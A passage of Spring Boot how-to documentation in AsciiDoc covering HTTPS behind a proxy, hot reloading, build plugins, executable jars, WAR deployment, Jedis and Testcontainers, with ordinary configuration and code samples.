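\n\nA minimal in-memory sketch (the credentials are placeholders, for illustration only; use a real user store in production):\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic UserDetailsService userDetailsService() {\n\t\tUserDetails user = User.withUsername(\"user\")\n\t\t\t\t.password(\"{noop}password\")\n\t\t\t\t.roles(\"USER\")\n\t\t\t\t.build();\n\t\treturn new InMemoryUserDetailsManager(user);\n\t}\n----\n\n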
\n\n[[howto-enable-https]]\n=== Enable HTTPS When Running behind a Proxy Server\nEnsuring that all your main endpoints are only available over HTTPS is an important chore for any application.\nIf you use Tomcat as a servlet container, then Spring Boot adds Tomcat's own `RemoteIpValve` automatically if it detects some environment settings, and you should be able to rely on the `HttpServletRequest` to report whether it is secure or not (even downstream of a proxy server that handles the real SSL termination).\nThe standard behavior is determined by the presence or absence of certain request headers (`x-forwarded-for` and `x-forwarded-proto`), whose names are conventional, so it should work with most front-end proxies.\nYou can switch on the valve by adding some entries to `application.properties`, as shown in the following example:\n\n[source,properties,indent=0,configprops]\n----\n\tserver.tomcat.remoteip.remote-ip-header=x-forwarded-for\n\tserver.tomcat.remoteip.protocol-header=x-forwarded-proto\n----\n\n(The presence of either of those properties switches on the valve.\nAlternatively, you can add the `RemoteIpValve` by adding a `TomcatServletWebServerFactory` bean.)\n\nTo configure Spring Security to require a secure channel for all (or some) requests, consider adding your own `WebSecurityConfigurerAdapter` that adds the following `HttpSecurity` configuration:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration(proxyBeanMethods = false)\n\tpublic class SslWebSecurityConfigurerAdapter extends WebSecurityConfigurerAdapter {\n\n\t\t@Override\n\t\tprotected void configure(HttpSecurity http) throws Exception {\n\t\t\t\/\/ Customize the application security\n\t\t\thttp.requiresChannel().anyRequest().requiresSecure();\n\t\t}\n\n\t}\n----\n\n\n\n[[howto-hotswapping]]\n== Hot Swapping\nSpring Boot supports hot swapping.\nThis section answers questions about how it works.\n\n\n\n[[howto-reload-static-content]]\n=== Reload Static Content\nThere are several options for hot reloading.\nThe recommended approach is to use <<using-spring-boot.adoc#using-boot-devtools,`spring-boot-devtools`>>, as it provides additional development-time features, such as support for fast application restarts and LiveReload as well as sensible development-time configuration (such as template caching).\nDevtools works by monitoring the classpath for changes.\nThis means that static resource changes must be \"built\" for the change to take effect.\nBy default, this happens automatically in Eclipse when you save your changes.\nIn IntelliJ IDEA, the Make Project command triggers the necessary build.\nDue to the <<using-spring-boot.adoc#using-boot-devtools-restart-exclude, default restart exclusions>>, changes to static resources do not trigger a restart of your application.\nThey do, however, trigger a live reload.\n\nAlternatively, running in an IDE (especially with debugging on) is a good way to do development (all modern IDEs allow reloading of static resources and usually also allow hot-swapping of Java class changes).\n\nFinally, the <<build-tool-plugins.adoc#build-tool-plugins, Maven and Gradle plugins>> can be configured (see the `addResources` property) to support running from the command line with reloading of static files directly from source.\nYou can use that with an external css\/js compiler process if you are writing that code with higher-level tools.\n\n\n\n[[howto-reload-thymeleaf-template-content]]\n=== Reload Templates without Restarting the Container\nMost of the templating technologies supported by Spring Boot include a configuration option to disable caching (described later in this document).\nIf you use the `spring-boot-devtools` module, these properties are <<using-spring-boot.adoc#using-boot-devtools-property-defaults,automatically configured>> for you at development time.\n\n\n\n[[howto-reload-thymeleaf-content]]\n==== Thymeleaf Templates\nIf you use Thymeleaf, set `spring.thymeleaf.cache` to `false`.\nSee {spring-boot-autoconfigure-module-code}\/thymeleaf\/ThymeleafAutoConfiguration.java[`ThymeleafAutoConfiguration`] for other Thymeleaf customization options.\n\n\n\n[[howto-reload-freemarker-content]]\n==== FreeMarker Templates\nIf you use FreeMarker, set `spring.freemarker.cache` to `false`.\nSee 
{spring-boot-autoconfigure-module-code}\/freemarker\/FreeMarkerAutoConfiguration.java[`FreeMarkerAutoConfiguration`] for other FreeMarker customization options.\n\n\n\n[[howto-reload-groovy-template-content]]\n==== Groovy Templates\nIf you use Groovy templates, set `spring.groovy.template.cache` to `false`.\nSee {spring-boot-autoconfigure-module-code}\/groovy\/template\/GroovyTemplateAutoConfiguration.java[`GroovyTemplateAutoConfiguration`] for other Groovy customization options.\n\n\n\n[[howto-reload-fast-restart]]\n=== Fast Application Restarts\nThe `spring-boot-devtools` module includes support for automatic application restarts.\nWhile not as fast as technologies such as https:\/\/www.jrebel.com\/products\/jrebel[JRebel], it is usually significantly faster than a \"`cold start`\".\nYou should probably give it a try before investigating some of the more complex reload options discussed later in this document.\n\nFor more details, see the <<using-spring-boot.adoc#using-boot-devtools>> section.\n\n\n\n[[howto-reload-java-classes-without-restarting]]\n=== Reload Java Classes without Restarting the Container\nMany modern IDEs (Eclipse, IDEA, and others) support hot swapping of bytecode.\nConsequently, if you make a change that does not affect class or method signatures, it should reload cleanly with no side effects.\n\n\n\n[[howto-build]]\n== Build\nSpring Boot includes build plugins for Maven and Gradle.\nThis section answers common questions about these plugins.\n\n\n\n[[howto-build-info]]\n=== Generate Build Information\nBoth the Maven plugin and the Gradle plugin allow generating build information containing the coordinates, name, and version of the project.\nThe plugins can also be configured to include additional properties.\nWhen the resulting `META-INF\/build-info.properties` file is present, Spring Boot auto-configures a `BuildProperties` bean.\n\nTo generate build information with Maven, add an execution for the `build-info` goal, as shown in the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>build-info<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nTIP: See the {spring-boot-maven-plugin-docs}#goals-build-info[Spring Boot Maven Plugin documentation] for more details.\n\nThe following example does the same with Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tspringBoot {\n\t\tbuildInfo()\n\t}\n----\n\nTIP: See the {spring-boot-gradle-plugin-docs}#integrating-with-actuator-build-info[Spring Boot Gradle Plugin documentation] for more details.
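\n\nOnce that file is on the classpath, the auto-configured `BuildProperties` bean can be injected like any other bean; a minimal sketch (the component is illustrative):\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class BuildVersionLogger {\n\n\t\tpublic BuildVersionLogger(BuildProperties buildProperties) {\n\t\t\t\/\/ Coordinates captured at build time by the build-info goal\/task\n\t\t\tSystem.out.println(\"Running version \" + buildProperties.getVersion());\n\t\t}\n\n\t}\n----\n\n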
\n\n[[howto-git-info]]\n=== Generate Git Information\nBoth Maven and Gradle allow generating a `git.properties` file containing information about the state of your `git` source code repository when the project was built.\n\nFor Maven users, the `spring-boot-starter-parent` POM includes a pre-configured plugin to generate a `git.properties` file.\nTo use it, add the following declaration to your POM:\n\n[source,xml,indent=0]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>pl.project13.maven<\/groupId>\n\t\t\t\t<artifactId>git-commit-id-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nGradle users can achieve the same result by using the https:\/\/plugins.gradle.org\/plugin\/com.gorylenko.gradle-git-properties[`gradle-git-properties`] plugin, as shown in the following example:\n\n[source,groovy,indent=0]\n----\n\tplugins {\n\t\tid \"com.gorylenko.gradle-git-properties\" version \"2.2.2\"\n\t}\n----\n\nTIP: The commit time in `git.properties` is expected to match the following format: `yyyy-MM-dd'T'HH:mm:ssZ`.\nThis is the default format for both plugins listed above.\nUsing this format lets the time be parsed into a `Date`, and its format, when serialized to JSON, is then controlled by Jackson's date serialization configuration settings.\n\n\n\n[[howto-customize-dependency-versions]]\n=== Customize Dependency Versions\nThe `spring-boot-dependencies` POM manages the versions of common dependencies.\nThe Spring Boot plugins for Maven and Gradle allow these managed dependency versions to be customized using build properties.\n\nWARNING: Each Spring Boot release is designed and tested against this specific set of third-party dependencies.\nOverriding versions may cause compatibility issues.\n\nTo override dependency versions with Maven, see {spring-boot-maven-plugin-docs}#using[this section] of the Maven plugin's documentation.\n\nTo override dependency versions in Gradle, see {spring-boot-gradle-plugin-docs}#managing-dependencies-customizing[this section] of the Gradle plugin's documentation.\n\n\n\n[[howto-create-an-executable-jar-with-maven]]\n=== Create an Executable JAR with Maven\nThe `spring-boot-maven-plugin` can be used to create an executable \"`fat`\" JAR.\nIf you use the `spring-boot-starter-parent` POM, you can declare the plugin and your jars are repackaged as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nIf you do not use the parent POM, you can still use the plugin.\nHowever, you must additionally add an `<executions>` section, as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>repackage<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nSee the {spring-boot-maven-plugin-docs}#repackage[plugin documentation] for full usage details.\n\n\n\n[[howto-create-an-additional-executable-jar]]\n=== Use a Spring Boot Application as a Dependency\nLike a war file, a Spring Boot application is not intended to be used as a dependency.\nIf your application contains classes that you want to share with other projects, the recommended approach is to move that code into a separate module.\nThe separate module can then be depended upon by your application and other projects.\n\nIf you cannot rearrange your code as recommended above, Spring Boot's Maven and Gradle plugins must be configured to produce a 
separate artifact that is suitable for use as a dependency.\nThe executable archive cannot be used as a dependency as the <<appendix-executable-jar-format.adoc#executable-jar-jar-file-structure,executable jar format>> packages application classes in `BOOT-INF\/classes`.\nThis means that they cannot be found when the executable jar is used as a dependency.\n\nTo produce the two artifacts, one that can be used as a dependency and one that is executable, a classifier must be specified.\nThis classifier is applied to the name of the executable archive, leaving the default archive for use as a dependency.\n\nTo configure a classifier of `exec` in Maven, you can use the following configuration:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<classifier>exec<\/classifier>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\n\n\n[[howto-extract-specific-libraries-when-an-executable-jar-runs]]\n=== Extract Specific Libraries When an Executable Jar Runs\nMost nested libraries in an executable jar do not need to be unpacked in order to run.\nHowever, certain libraries can have problems.\nFor example, JRuby includes its own nested jar support, which assumes that the `jruby-complete.jar` is always directly available as a file in its own right.\n\nTo deal with any problematic libraries, you can flag that specific nested jars should be automatically unpacked when the executable jar first runs.\nSuch nested jars are written beneath the temporary directory identified by the `java.io.tmpdir` system property.\n\nWARNING: Care should be taken to ensure that your operating system is configured so that it will not delete the jars that have been unpacked to the temporary directory while the application is still running.\n\nFor example, to indicate that JRuby should be flagged for unpacking by using the Maven Plugin, you would add the following configuration:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<requiresUnpack>\n\t\t\t\t\t\t<dependency>\n\t\t\t\t\t\t\t<groupId>org.jruby<\/groupId>\n\t\t\t\t\t\t\t<artifactId>jruby-complete<\/artifactId>\n\t\t\t\t\t\t<\/dependency>\n\t\t\t\t\t<\/requiresUnpack>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\n\n\n[[howto-create-a-nonexecutable-jar]]\n=== Create a Non-executable JAR with Exclusions\nOften, if you have an executable and a non-executable jar as two separate build products, the executable version has additional configuration files that are not needed in a library jar.\nFor example, the `application.yml` configuration file might be excluded from the non-executable JAR.\n\nIn Maven, the executable jar must be the main artifact and you can add a classified jar for the library, as 
follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-jar-plugin<\/artifactId>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<id>lib<\/id>\n\t\t\t\t\t\t<phase>package<\/phase>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>jar<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t\t<configuration>\n\t\t\t\t\t\t\t<classifier>lib<\/classifier>\n\t\t\t\t\t\t\t<excludes>\n\t\t\t\t\t\t\t\t<exclude>application.yml<\/exclude>\n\t\t\t\t\t\t\t<\/excludes>\n\t\t\t\t\t\t<\/configuration>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\n\n\n[[howto-remote-debug-maven-run]]\n=== Remote Debug a Spring Boot Application Started with Maven\nTo attach a remote debugger to a Spring Boot application that was started with Maven, you can use the `jvmArguments` property of the {spring-boot-maven-plugin-docs}[maven plugin].\n\nSee {spring-boot-maven-plugin-docs}#run-example-debug[this example] for more details.\n\n\n\n[[howto-build-an-executable-archive-with-ant]]\n=== Build an Executable Archive from Ant without Using spring-boot-antlib\nTo build with Ant, you need to grab dependencies, compile, and then create a jar or war archive.\nTo make it executable, you can either use the `spring-boot-antlib` module or you can follow these instructions:\n\n. If you are building a jar, package the application's classes and resources in a nested `BOOT-INF\/classes` directory.\n If you are building a war, package the application's classes in a nested `WEB-INF\/classes` directory as usual.\n. Add the runtime dependencies in a nested `BOOT-INF\/lib` directory for a jar or `WEB-INF\/lib` for a war.\n Remember *not* to compress the entries in the archive.\n. Add the `provided` (embedded container) dependencies in a nested `BOOT-INF\/lib` directory for a jar or `WEB-INF\/lib-provided` for a war.\n Remember *not* to compress the entries in the archive.\n. Add the `spring-boot-loader` classes at the root of the archive (so that the `Main-Class` is available).\n. 
Use the appropriate launcher (such as `JarLauncher` for a jar file) as a `Main-Class` attribute in the manifest and specify the other properties it needs as manifest entries -- principally, by setting a `Start-Class` property.\n\nThe following example shows how to build an executable archive with Ant:\n\n[source,xml,indent=0]\n----\n\t<target name=\"build\" depends=\"compile\">\n\t\t<jar destfile=\"target\/${ant.project.name}-${spring-boot.version}.jar\" compress=\"false\">\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"target\/classes\" \/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/classes\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"src\/main\/resources\" erroronmissingdir=\"false\"\/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/classes\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"${lib.dir}\/runtime\" \/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/lib\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<zipfileset src=\"${lib.dir}\/loader\/spring-boot-loader-jar-${spring-boot.version}.jar\" \/>\n\t\t\t<manifest>\n\t\t\t\t<attribute name=\"Main-Class\" value=\"org.springframework.boot.loader.JarLauncher\" \/>\n\t\t\t\t<attribute name=\"Start-Class\" value=\"${start-class}\" \/>\n\t\t\t<\/manifest>\n\t\t<\/jar>\n\t<\/target>\n----\n\n\n\n[[howto-traditional-deployment]]\n== Traditional Deployment\nSpring Boot supports traditional deployment as well as more modern forms of deployment.\nThis section answers common questions about traditional deployment.\n\n\n\n[[howto-create-a-deployable-war-file]]\n=== Create a Deployable War File\n\nWARNING: Because Spring WebFlux does not strictly depend on the Servlet API and applications are deployed by default on an embedded Reactor Netty server, War deployment is not supported for WebFlux applications.\n\nThe first step in producing a deployable war file is to provide a `SpringBootServletInitializer` subclass and override its `configure` method.\nDoing so makes use of Spring Framework's Servlet 3.0 support and lets you configure your application when it is launched by the servlet container.\nTypically, you should update your application's main class to extend `SpringBootServletInitializer`, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder application) {\n\t\t\treturn application.sources(Application.class);\n\t\t}\n\n\t\tpublic static void main(String[] args) {\n\t\t\tSpringApplication.run(Application.class, args);\n\t\t}\n\n\t}\n----\n\nThe next step is to update your build configuration such that your project produces a war file rather than a jar file.\nIf you use Maven and `spring-boot-starter-parent` (which configures Maven's war plugin for you), all you need to do is to modify `pom.xml` to change the packaging to war, as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<packaging>war<\/packaging>\n----\n\nIf you use Gradle, you need to modify `build.gradle` to apply the war plugin to the project, as follows:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tapply plugin: 'war'\n----\n\nThe final step in the process is to ensure that the embedded servlet container does not interfere with the servlet container to which the war file is deployed.\nTo do so, you need to mark the 
embedded servlet container dependency as being provided.\n\nIf you use Maven, the following example marks the servlet container (Tomcat, in this case) as being provided:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependencies>\n\t\t<!-- \u2026 -->\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t<scope>provided<\/scope>\n\t\t<\/dependency>\n\t\t<!-- \u2026 -->\n\t<\/dependencies>\n----\n\nIf you use Gradle, the following example marks the servlet container (Tomcat, in this case) as being provided:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\t\/\/ \u2026\n\t\tprovidedRuntime 'org.springframework.boot:spring-boot-starter-tomcat'\n\t\t\/\/ \u2026\n\t}\n----\n\nTIP: `providedRuntime` is preferred to Gradle's `compileOnly` configuration.\nAmong other limitations, `compileOnly` dependencies are not on the test classpath, so any web-based integration tests fail.\n\nIf you use the <<build-tool-plugins.adoc#build-tool-plugins, Spring Boot build tools>>, marking the embedded servlet container dependency as provided produces an executable war file with the provided dependencies packaged in a `lib-provided` directory.\nThis means that, in addition to being deployable to a servlet container, you can also run your application by using `java -jar` on the command line.\n\n\n\n[[howto-convert-an-existing-application-to-spring-boot]]\n=== Convert an Existing Application to Spring Boot\nFor a non-web application, it should be easy to convert an existing Spring application to a Spring Boot application.\nTo do so, throw away the code that creates your `ApplicationContext` and replace it with calls to `SpringApplication` or `SpringApplicationBuilder`.\nSpring MVC web applications are generally amenable to first creating a deployable war application and then migrating it later to an executable war or jar.\nSee the https:\/\/spring.io\/guides\/gs\/convert-jar-to-war\/[Getting Started Guide on Converting a jar to a war].\n\nTo create a deployable war by extending `SpringBootServletInitializer` (for example, in a class called `Application`) and adding the Spring Boot `@SpringBootApplication` annotation, use code similar to that shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder application) {\n\t\t\t\/\/ Customize the application or call application.sources(...) 
to add sources\n\t\t\t\/\/ Since our example is itself a @Configuration class (via @SpringBootApplication)\n\t\t\t\/\/ we actually don't need to override this method.\n\t\t\treturn application;\n\t\t}\n\n\t}\n----\n\nRemember that whatever you put in the `sources` is merely a Spring `ApplicationContext`.\nNormally, anything that already works should work here.\nThere might be some beans you can remove later and let Spring Boot provide its own defaults for them, but it should be possible to get something working before you need to do that.\n\nStatic resources can be moved to `\/public` (or `\/static` or `\/resources` or `\/META-INF\/resources`) in the classpath root.\nThe same applies to `messages.properties` (which Spring Boot automatically detects in the root of the classpath).\n\nVanilla usage of Spring `DispatcherServlet` and Spring Security should require no further changes.\nIf you have other features in your application (for instance, using other servlets or filters), you may need to add some configuration to your `Application` context to replace those elements from the `web.xml`, as follows:\n\n* A `@Bean` of type `Servlet` or `ServletRegistrationBean` installs that bean in the container as if it were a `<servlet\/>` and `<servlet-mapping\/>` in `web.xml`.\n* A `@Bean` of type `Filter` or `FilterRegistrationBean` behaves similarly (as a `<filter\/>` and `<filter-mapping\/>`).\n* An `ApplicationContext` in an XML file can be added through an `@ImportResource` in your `Application`.\n Alternatively, simple cases where annotation configuration is heavily used already can be recreated in a few lines as `@Bean` definitions.\n\nOnce the war file is working, you can make it executable by adding a `main` method to your `Application`, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(Application.class, args);\n\t}\n----\n\n[NOTE]\n====\nIf you intend to start your application as a war or as an executable application, you need to share the customizations of the builder in a method that is available both to the `SpringBootServletInitializer` callback and to the `main` method in a class similar to the following:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder builder) {\n\t\t\treturn configureApplication(builder);\n\t\t}\n\n\t\tpublic static void main(String[] args) {\n\t\t\tconfigureApplication(new SpringApplicationBuilder()).run(args);\n\t\t}\n\n\t\tprivate static SpringApplicationBuilder configureApplication(SpringApplicationBuilder builder) {\n\t\t\treturn builder.sources(Application.class).bannerMode(Banner.Mode.OFF);\n\t\t}\n\n\t}\n----\n====\n\nApplications can fall into more than one category:\n\n* Servlet 3.0+ applications with no `web.xml`.\n* Applications with a `web.xml`.\n* Applications with a context hierarchy.\n* Applications without a context hierarchy.\n\nAll of these should be amenable to translation, but each might require slightly different techniques.\n\nServlet 3.0+ applications might translate pretty easily if they already use the Spring Servlet 3.0+ initializer support classes.\nNormally, all the code from an existing `WebApplicationInitializer` can be moved into a `SpringBootServletInitializer`.\nIf your existing application has more than one 
`ApplicationContext` (for example, if it uses `AbstractDispatcherServletInitializer`) then you might be able to combine all your context sources into a single `SpringApplication`.\nThe main complication you might encounter is if combining does not work and you need to maintain the context hierarchy.\nSee the <<howto-build-an-application-context-hierarchy, entry on building a hierarchy>> for examples.\nAn existing parent context that contains web-specific features usually needs to be broken up so that all the `ServletContextAware` components are in the child context.\n\nApplications that are not already Spring applications might be convertible to Spring Boot applications, and the previously mentioned guidance may help.\nHowever, you may yet encounter problems.\nIn that case, we suggest https:\/\/stackoverflow.com\/questions\/tagged\/spring-boot[asking questions on Stack Overflow with a tag of `spring-boot`].\n\n\n\n[[howto-weblogic]]\n=== Deploying a WAR to WebLogic\nTo deploy a Spring Boot application to WebLogic, you must ensure that your servlet initializer *directly* implements `WebApplicationInitializer` (even if you extend from a base class that already implements it).\n\nA typical initializer for WebLogic should resemble the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\timport org.springframework.boot.autoconfigure.SpringBootApplication;\n\timport org.springframework.boot.web.servlet.support.SpringBootServletInitializer;\n\timport org.springframework.web.WebApplicationInitializer;\n\n\t@SpringBootApplication\n\tpublic class MyApplication extends SpringBootServletInitializer implements WebApplicationInitializer {\n\n\t}\n----\n\nIf you use Logback, you also need to tell WebLogic to prefer the packaged version rather than the version that was pre-installed with the server.\nYou can do so by adding a `WEB-INF\/weblogic.xml` file with the following contents:\n\n[source,xml,indent=0]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<wls:weblogic-web-app\n\t\txmlns:wls=\"http:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/java.sun.com\/xml\/ns\/javaee\n\t\t\thttps:\/\/java.sun.com\/xml\/ns\/javaee\/ejb-jar_3_0.xsd\n\t\t\thttp:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\n\t\t\thttps:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\/1.4\/weblogic-web-app.xsd\">\n\t\t<wls:container-descriptor>\n\t\t\t<wls:prefer-application-packages>\n\t\t\t\t<wls:package-name>org.slf4j<\/wls:package-name>\n\t\t\t<\/wls:prefer-application-packages>\n\t\t<\/wls:container-descriptor>\n\t<\/wls:weblogic-web-app>\n----\n\n\n\n[[howto-use-jedis-instead-of-lettuce]]\n=== Use Jedis Instead of Lettuce\nBy default, the Spring Boot starter (`spring-boot-starter-data-redis`) uses https:\/\/github.com\/lettuce-io\/lettuce-core\/[Lettuce].\nYou need to exclude that dependency and include the https:\/\/github.com\/xetorthio\/jedis\/[Jedis] one instead.\nSpring Boot manages these dependencies to help make this process as easy as possible.\n\nThe following example shows how to do so in 
Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-data-redis<\/artifactId>\n\t\t<exclusions>\n\t\t\t<exclusion>\n\t\t\t\t<groupId>io.lettuce<\/groupId>\n\t\t\t\t<artifactId>lettuce-core<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>redis.clients<\/groupId>\n\t\t<artifactId>jedis<\/artifactId>\n\t<\/dependency>\n----\n\nThe following example shows how to do so in Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\timplementation('org.springframework.boot:spring-boot-starter-data-redis') {\n\t\t\texclude group: 'io.lettuce', module: 'lettuce-core'\n\t\t}\n\t\timplementation 'redis.clients:jedis'\n\t\t\/\/ ...\n\t}\n----\n\n\n\n[[howto-testcontainers]]\n=== Use Testcontainers for Integration Testing\nThe https:\/\/www.testcontainers.org\/[Testcontainers] library provides a way to manage services running inside Docker containers.\nIt integrates with JUnit, allowing you to write a test class that can start up a container before any of the tests run.\nTestcontainers is especially useful for writing integration tests that talk to a real backend service such as MySQL, MongoDB, or Cassandra.\nTestcontainers can be used in a Spring Boot test as follows:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n@SpringBootTest\n@Testcontainers\nclass ExampleIntegrationTests {\n\n\t@Container\n\tstatic Neo4jContainer<?> neo4j = new Neo4jContainer<>();\n\n}\n----\n\nThis starts a Docker container running Neo4j (if Docker is running locally) before any of the tests are run.\nIn most cases, you will need to configure the application using details from the running container, such as its IP address or port.\n\nThis can be done with a static `@DynamicPropertySource` method that allows adding dynamic property values to the Spring `Environment`.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n@SpringBootTest\n@Testcontainers\nclass ExampleIntegrationTests {\n\n\t@Container\n\tstatic Neo4jContainer<?> neo4j = new Neo4jContainer<>();\n\n\t@DynamicPropertySource\n\tstatic void neo4jProperties(DynamicPropertyRegistry registry) {\n\t\tregistry.add(\"spring.data.neo4j.uri\", neo4j::getBoltUrl);\n\t}\n\n}\n----\n\nThe preceding configuration allows Neo4j-related beans in the application to communicate with Neo4j running inside the Testcontainers-managed Docker container.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"34d28f48ca1d048ad74b3bb76fc58ad4a9732804","subject":"Fix Undertow access log dir property name in doc","message":"Fix Undertow access log dir property name in doc\n\nSee 
